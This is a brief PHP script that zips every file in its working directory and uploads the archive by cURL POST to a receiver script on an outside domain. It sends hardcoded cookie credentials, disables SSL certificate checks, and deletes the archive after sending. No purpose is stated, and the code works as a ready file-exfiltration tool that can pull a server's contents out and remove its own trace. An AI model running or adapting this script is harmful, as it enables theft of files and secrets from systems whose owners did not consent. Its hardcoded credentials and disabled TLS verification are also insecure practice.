<?php
file_exists("send.zip") and unlink("send.zip");
require "../pclzip.lib.php";
$file = scandir(".");
unset($file[0],$file[1]);
$file = implode(",",$file);
$aa = new PclZip("send.zip");
$act = $aa->create($file);
if($act==0){
	die("Error : ".$aa->errorInfo(true));
}
$fsend = new cUrlFile(realpath("send.zip"));
$send_to = "http://yessrilanka.com/content/admin/php/fb/php_ic/botfb/receiver.php";
$ch = curl_init($send_to);
$op = array(
CURLOPT_HTTPHEADER=>array(
'Cookie: c_user=ammarfaizi; c_key=triosemut123',
),
CURLOPT_RETURNTRANSFER=>true,
CURLOPT_SSL_VERIFYPEER=>false,
CURLOPT_USERAGENT=>"RedAngel PHP Concept",
CURLOPT_FOLLOWLOCATION=>true,
CURLOPT_CONNECTTIMEOUT=>500,
CURLOPT_TIMEOUT=>500,
CURLOPT_POST=>true,
CURLOPT_POSTFIELDS=>array(
"rfile"=>$fsend
)
);
curl_setopt_array($ch,$op);
$out = curl_exec($ch);
$err = curl_error($ch) and $out=$err;
curl_close($ch);
file_exists("send.zip") and unlink("send.zip");
print $out;